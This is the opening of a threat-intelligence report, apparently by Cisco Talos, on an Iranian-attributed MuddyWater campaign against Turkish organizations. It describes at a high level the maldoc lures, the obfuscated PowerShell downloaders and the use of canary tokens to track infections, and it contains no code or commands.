By Asheer Malhotra and Vitor Ventura.
- Cisco Talos has observed a new campaign targeting Turkish private organizations alongside governmental institutions.
- Talos attributes this campaign with high confidence to MuddyWater — an APT group recently attributed to Iran's Ministry of Intelligence and Security (MOIS) by the U.S. Cyber Command.
- This campaign utilizes malicious PDFs, XLS files and Windows executables to deploy malicious PowerShell-based downloaders acting as initial footholds into the target's enterprise. MuddyWater's use of script based components such as obfuscated PowerShell based downloaders is also a tactic described in the advisory from January 2021 by the U.S. Cyber Command.
- This campaign also utilizes canary tokens to track successful infection of targets, a new addition to this group's arsenal of tactics, techniques and procedures (TTPs).
- This specific method of taking advantage of canary tokens in this campaign may also be a measure to evade sandbox based detection systems.
- A highly motivated threat actor such as MuddyWater can use unauthorized access to conduct espionage, intellectual property theft and deploy ransomware and destructive malware in an enterprise.
Executive summary
MuddyWater has conducted various campaigns against entities spread throughout the U.S.A, Europe, Middle East and South Asia.
A typical TTP employed by the group is the heavy use of scripting in their infection chains using languages like PowerShell and Visual Basic coupled with the frequent use of living-off-the-land binaries (LoLBins).
Cisco Talos recently observed a campaign operated by MuddyWater targeting users in Turkey. This campaign consists of the use of malicious PDFs and Microsoft Office documents (maldocs) to serve as the initial infection vector. These maldocs were named in such a way as to masquerade as legitimate documents from the Turkish Health and Interior Ministries.
Next, the malware executes a series of scripts deployed on the infected endpoint to serve as downloaders and instrumentors for additional payloads.
We've also discovered the use of flags or tokens in attacks conducted by this threat actor in this campaign. These tokens are meant to signal a successful infection of a target by the group's malicious artifacts.